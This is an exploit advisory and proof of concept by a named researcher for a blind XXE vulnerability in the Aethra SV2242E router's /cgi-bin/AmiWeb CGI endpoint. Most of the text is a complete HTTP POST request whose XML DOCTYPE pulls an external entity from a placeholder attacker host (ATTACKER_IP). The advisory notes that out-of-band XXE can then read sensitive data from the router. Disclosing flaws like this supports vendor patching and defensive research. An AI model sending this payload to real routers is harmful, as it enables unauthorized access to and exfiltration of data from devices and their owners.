# Author : Ahmed Sultan
# Email : 0x4148@gmail.com
# Vuln. software : Aethra SV2242E
# Vendor site : aethra.it
# CVE : Requested , but haven't been assigned yet
# tested on : ATOS 5.6.x
The bug rise because of the remote user input to "/cgi-bin/AmiWeb" is not
sensitized before being parsed which cause the availability of blind XXE
attack that might result in reading sensitive data from the router system
A proof of concept
POST /cgi-bin/AmiWeb HTTP/1.1
Content-type: application/xml
Host: ROUTER_IP
Content-Length: 155
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk">
%remote;
%int;
%trick;]>
That will result in HTTP request to ATTACKER_IP/0x4148_jnk
further exploitation might be done by using OOB (Out Of Bound) XXE attacks
to reach sensitive data on the server